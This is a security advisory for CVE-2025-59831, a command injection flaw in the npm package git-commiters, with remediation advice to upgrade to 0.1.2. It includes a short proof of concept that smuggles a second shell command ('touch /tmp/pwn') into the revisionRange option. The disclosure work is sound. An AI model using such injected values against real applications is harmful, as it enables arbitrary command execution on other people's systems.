CVE-2025-59831
`git-commiters` Command Injection vulnerability

Description
## Background on the vulnerability

This vulnerability manifests through the library's primary exported API, `gitCommiters(options, callback)`, which accepts options such as `cwd` (the current working directory) and `revisionRange` (a revision pointer such as `HEAD`). However, the library neither sanitizes user input nor uses a secure process execution API that separates the command from its arguments, so uncontrolled user input is concatenated directly into the executed command.

## Exploit

1. Install `[email protected]` or earlier
2. Initialize a new Git directory with commits in it
3. Create the following script in that directory:

```js
var gitCommiters = require("git-commiters");
var options = {
  cwd: "./",
  revisionRange: "HEAD; touch /tmp/pwn; #",
};
gitCommiters(options, function (err, result) {
  if (err) console.log(err);
  else console.log(result);
});
```

4. Observe the new file created on disk at `/tmp/pwn`

The git commiters functionality also works as expected despite the command execution, which further compounds the problem: it may not be apparent that a command injection occurred in a running application.

```sh
@lirantal ➜ /workspaces/git-commiters.js (master) $ node app.js
[
  { email: '[email protected]', name: 'Morton Fox', deletions: 1, insertions: 1, commits: 1 },
  { email: '[email protected]', name: 'Riceball LEE', deletions: 11, insertions: 1198, commits: 7 }
]
@lirantal ➜ /workspaces/git-commiters.js (master) $ ls -alh /tmp/pwn
-rw-r--rw- 1 codespace codespace 0 Jul  1 06:09 /tmp/pwn
```

# Credit

Liran Tal
How to fix CVE-2025-59831

To fix CVE-2025-59831, upgrade the affected package to the patched version listed below.

- Upgrade to 0.1.2 or later

Is CVE-2025-59831 being exploited?

Low: EPSS is 0.1%, and no large-scale exploitation activity has been observed so far.

Affected packages (1)

- from 0, < 0.1.2